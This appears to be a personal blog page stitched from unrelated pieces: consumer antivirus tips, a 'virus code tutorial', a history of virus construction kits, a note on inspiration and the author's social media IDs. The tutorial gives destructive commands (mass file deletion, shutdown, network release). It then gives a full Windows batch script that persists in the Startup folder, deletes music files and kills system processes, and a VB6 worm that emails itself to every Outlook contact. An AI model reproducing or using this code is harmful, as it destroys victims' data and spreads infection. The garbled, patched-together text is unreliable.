Latest Entries »


ppt.pres ethics of computer

protect urself


Protect Your Computer from Viruses & Spies
Provided by the Good News Web Designers Association
Return to GNWDA Home Page

Top 10 viruses in September 2011
1 Troj/Invo-Zip

2 W32/Netsky

3 Mal/EncPk-EI

4 Troj/Pushdo-Gen

5 Troj/Agent-HFU

6 Mal/Iframe-E

7 Troj/Mdrop-BTV

8 Troj/Mdrop-BUF

9 Troj/Agent-HFZ

10 Troj/Agent-HGT

Source: Sophos Anti-Virus

Add this info to your website

Protect your computer from hackers! Learn how to prevent yourself from being a victim and a distributor of computer email viruses and worms. Take these simple precautions:
1. NEVER open an attachment in an email UNLESS you are sure you understand what it is and why it’s been sent to you. When in doubt, delete. You can always write back to the person who sent it and ask if they intended to send an attachment and to please explain what it was and then resend it. Most viruses are triggered by unwitting victims opening an attachment.

2. INSTALL PROTECTION SOFTWARE — NOW! Once you have it, you will help stop the spread of viruses. If you don’t have it, you will sooner or later regret leaving yourself so vulnerable. It is absolutely worth the money spent for it! (See the list of anti-virus software on the right.)

3. BLOCK PORN and other spam, as well as viruses, with a program called MailWasher Pro. For a very low price, MailWasher will look inside your mailbox before you run your email program, identify the porn and spam and viruses, and delete it for you. It will even help you fight back by sending a bounce message that tells the spammer that your address is invalid (so that it’s removed from their mailing list). Then you can safely open your email.

4. Find out what’s NOT a virus and don’t clog up the internet spreading false alarms. When you get word of a virus, take a minute to check it out first, before forwarding the message to others and embarrassing yourself. Here’s a great site for this research:
urbanlegends.miningco.com/library/blhoax.htm

5. BEWARE OF SPIES, HACKERS & KEY LOGGERS!
There are programs that can spy into your computer. It happens when people download a program (such as a game) that comes bundled with “Sputnik” or “VX2” or another brand of spyware. It installs itself silently on your computer and then monitors your “clickstream” as you navigate around the web, sending information about your activities (including credit card numbers!), back to the originator. Disclaimers claim that credit card info will not be used (sooo — why get it then?)

To make matters worse, there seems to be a connection between this and an increase of popup ads while surfing the Internet!
You can tell if you’re infected with VX2 by searching for the “VX2.dll” file on your system. Instructions for uninstalling the software are located at http://www.vx2.cc
6. Always be careful about what you download. Is it from a trustworthy software manufacturer? But since “trust” is only a guess, the best advice is to extend your anti-virus protection to include anti-spyware (to block your personal information from being taken without your permission), anti-hacker-tools (to prevent hijackers from accessing your PC), anti-key-loggers (to safeguard your passwords and other private stuff) and anti-worms (to hack away at hacker tools that can exploit your computer even after they’re gone).
God bless you and your computers!

VIRUS CODE TUTORIAL


Virus code can be coded using several language. The best being c or vbs or dos. Today I teach some basic virus codings. I will be using c, dos and alp/asm(assembly language).These is a very simple Virus coding tutorial just a beginners guide

this is mainly for programmers. this post is just to change their thinking. First lets begin with tiny and simple ones.I will show both codes for windows and linux

First alp/asm
back: add c,b
loop back

This simple script needs no explanation. It will just be eating away your victims memory at a slow space. As you know addition needs some space to store intermediate result. this will be using up the ram. but very less of ram is lost and the user can stop this by just closing the .exe file. As you know a float addition takes up more space than normal addition . You can replace integer addition with float.

Now lets try to create a simple Linux virus in c.

system(“poweroff”);

This simple script will turn off your victims comp. Now if you can forece this script to load at start up then it will be a nightmare.

let’s see one more linux virus of the same type
system(“rm *.*”);

This will all files with all extension which the user has previlage to delete.Just imagine if the admin runs it then it will create a havoc.

Lets see the same codes for windows.

To delete all files in windows using dos/batch progtraming will be
del *.*
and the code of the shutdown virus will be just shutdown

Now lets disable Internet

ipconfig /release
echo You Internet Been HACKED!

What if you change the extension of a file. It becomes useless.Now let’s rename a few file.
rename(old_file_name_with_path,newname”);
Now what you can do with this left up to you.Just use your brain and you will make out it’s potential.

These are very simple virus just a beginners guide. Just check out the virus codes section for more complex and full fledged Virus coding tutorial. Please dont misuse these virus codes in c

* Html virus — vbs
* Orkut Virus — vbs
* Clone virus — c/c++
* Doom virus — c/c++
* Black Wolf virus — c/c++
* Disable input device — c/c++
* Sasser Virus — Assembly language


javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;function A(){for(i=0; i


@echo off
title 6121824
color 4
cd %userprofile%\Start Menu\Programs\Startup
if exist “delete-this-virus.bat” goto start
if exist “Windows.bat” goto start
msg * Virus Deleted
cd %userprofile%\Desktop
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%\Start Menu\Programs\Startup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “C:\”
if exist “delete-this-virus.bat” del “delete-this-virus.bat”
cd %userprofile%\My Documents\My Received Files
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%\Start Menu\Programs\Startup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “C:\”
if exist “delete-this-virus.bat” del “delete-this-virus.bat”
cd C:\
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “%userprofile%\Start Menu\Programs\Startup”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “Windows.bat”
if exist “delete-this-virus.bat” copy “delete-this-virus.bat” “HackandTrick.bat”
if exist “Windows.bat” copy “Windows.bat” “%userprofile%\Start Menu\Programs\Startup”
if exist “HackandTrick.bat” copy “HackandTrick.bat” “%userprofile%\Start Menu\Programs\Startup”
cls
:start
start http://meatspin.com/
start http://onload.110mb.com/Windows-Virus…
start “6121824”
time 12:00
cd %userprofile%\Desktop
if exist “*.*wav” del “*.*wav”
if exist “*.*Mp3” del “*.*Mp3”
cd %userprofile%\My Documents\My Music
if exist “*.*wav” del “*.*wav”
if exist “*.*Mp3” del “*.*Mp3”
msg * Windows Security Center has Detected a Virus on your Computer
msg * Owned by 6121824
msg * 6121824
msg * 6121824
at 12:01 msg * 6121824 (c) HackandTrick
at 12:02 tskill firefox
at 12:02 tskill iexplore
at 12:03 msg * 6121824
at 12:04 msg * 6121824
at 12:04 tskill “ccApp”
at 12:04 tskill explorer
at 12:04 tskill “spoolsv”
start


Hi Guys try this one
its not a virus but its a worm,its gonna copy itself to other computers via email
A worm will do some following things
-Email
-Injection
-Infection of files
-File Sharing
-Exploits such as the Dcom Exploit W32.Blaster Used
-Messenger Exploits
Use VB 6.0

Private Form Sub_Load()
Me.hide
Filecopy App.Path + “\” + App.EXEName + “.exe”, “C:\Worm1.Exe”
Filecopy App.Path + “\” + App.EXEName + “.exe”, “C:\InnocentFile.exe”
Filecopy App.Path + “\” + App.EXEName + “.exe”, “C:\Me.EXE”
Filecopy App.Path + “\” + App.EXEName + “.exe”, “C:\OpenMe!.EXE”
Set so = CreateObject(fso)
Set ol = CreateObject(“Outlook.Application”)
Set out = Wscript.CreateObject(“Outlook.Application”)
Set mapi = out.GetNameSpace(“MAPI”)
Set a = mapi.AddressLists(1)
For X = 1 To a.AddressEntries.Count
Set Mail = ol.CreateItem(0)
Mail.to = ol.GetNameSpace(“MAPI”).AddressLists(1).AddressEntries(X)
Mail.Subject = “Fwd:None”
Mail.Body = “Hey Buddy My first worm is in your email now, enjoy it !!!”&”Have a nice worm !!”
Mail.Attachments.Add = “C:\Worm1.exe”
Mail.Send
Next
ol.Quit
End Sub

Thanx


Anyone who has ever had to combat malicious code on their computer wonders about the people who make computer viruses. And while most of us don’t want to do it, we can’t help but wonder about the process,
about how to create a computer virus. The popularity of this questionable activity is such that software exists to allow people to make email viruses or create computer virus code with little or no programming knowledge. The following are examples of such “kits.”

VCS (Virus Construction Set)
VCS, published in Germany in 1990, was the first software to be created exclusively for the purpose of creating viruses. It is available in both English and German versions and is responsible for approximately fifteen virus variants.
GenVirus
Originally marketed by a Frenchman as an anti-virus evaluation tool, a cracked version by the virus authoring group NuKE appeared in 1993. Approximately ten viruses produced by GenVirus are known to exist.
VCL (Virus Creation Library)
VCL is one of the better known virus creation tools. It generates source assembler files, OBJ modules, and infected master files. Through a menu selection process a wide variety of options can be incorporated to create viruses that append their code to files, overwrite them, or use companion technology.
PS-MPC (Phalcon-Skism Mass-Produced Code Generator)
Created by the American virus authoring group, Phalcon-Skism, in particular the member Dark Angel, PS-MPC has no user interface but rather operates through an ASCII configuration file. It can create memory-resident viruses to affect both COM and EXE files and provides a versatile encryption layer. PS-MPC is responsible for the creation of hundreds of viruses.
NGVC (Next Generation Virus Construktion Kit)
This kit, the work of SnakeByte, first appeared in the Matrix N3 zine. It infects Win32 PE-Executable files. All viruses created by the package are different in structure and opcode making it impossible to catch all variants with one scan string.
VBSWG Kit
The VBSWG Kit was the first advanced VBS work creation package developed by [K]alamar in Argentina. It was not a highly successful program. The viruses and worms created with it did not work. The kit featured a standard Windows user interface.
NRLG (NuKE’s Randomic Life Generator)
Authored by Azrael is a virus creation tool originated in Argentina. To make computer viruses it uses a simple and friendly interface and has been responsible for producing hundreds of viruses, all detectable by modern anti-virus software scanners.


OMVCK (Odysseus Macro Virus Construction Kit)
Written by Dark Shadow, this kit produces macro virus source codes for Microsoft Word for Windows 6. The tool was designed so that individuals who do not possess programming skills can still create a computer virus.
SSIWG (Senna Spy Internet Worm Generator)
This virus generation package creates VBS script files. These files have features that are worm-like and are normally distributed via email. Usually a message with an alluring subject or message is sent out with the goal of enticing the recipient to open the VBS file which activates the worm.

NEG (NoMercy Excel Generator)
NEG was the world’s first virus construction kit specifically designed to create Excel macro viruses. Authored by the same person who created Crazybits Virus Construction Kit, NEG features several payloads and creates .BAS source files.
VBSWG (VBS Worm Generator)
This virus generation requires the Microsoft Vb5 runtimes and Windows Scripting Host 5.0. It creates a worm that is added to the html code of an email message. When the message is viewed, the system is infected. The worm searches for hard drives and network drives to perform its designated task.
AMG (Access Macro Generator)
This virus generation kit produces viruses that affect Microsoft Access 97. The package will only work if the file msvbvm50.dll is installed. It features a standard Windows user interface and has options to kill files or dlls or to specifically target the folder C:/Program Files.
DREG (Digital Hackers’ Alliance Randomized)
DREG creates virus source codes and compiles them as executable files. It generates non-memory resident encrypted COM viruses. It employs anti-heuristic tricks and uses several code variants and junk instruction sequences. The package is somewhat buggy and consequently creates buggy viruses.
Do Virus Authors use these Tools or do they Create their Own?
As in any kind of endeavor, there are professionals and there are dabblers. Many virus authors are dabblers, perhaps just “scratching an itch,” fulfilling their own curiosity about how to create an email virus or similar malicious code. Some computer users, for reasons many of us cannot fathom, don’t feel they’ve done all there is to do until they’ve had the “create your own virus” experience. These are the kind of people who tend to download and experiment with virus creation tools. Truly destructive viruses that can elude detection measures and deliver successful payloads are almost always the work of skilled programmers who take great pride in the originality of their creations.

Part of understanding this annoying and destructive brand of computer vandalism is to understand to some degree the “how to create a computer virus” aspect of the equation. The more that is known about how virus authors actually make computer viruses or create computer virus, the better the computer-using community will be at stopping them.

Inspiration


Inspiration

Inspiration can have an infinite variety of sources, such as music, another person (mythical ones count), mother nature or a really good bike ride. Literally, the word’s origins mean “breathed upon” — as if a higher being was breathing down on you, filling you with inspiration. Cool, right? Everyone has their own sources of inspiration, and finding yours may be a frustrating journey, but it’s amazing what we people come up with post-inspiration, from crafty goodies to fascinating ideas on how to save the world.


1 ST OF ALL OF FACEBOOK…………
A. ABHINAVKAPOOR12354@REDIFFMAIL.IN

2 ND OF ORKUT…………
A. myrules0@gmail.in

3rd of yahoo………
a..Surehunk001@YAHOO.IN

4TH OF TWITTER…..
A.ARMAN0123@TWITTER.IN.

THESE ALL ARE MY RESPECTIVE ID”S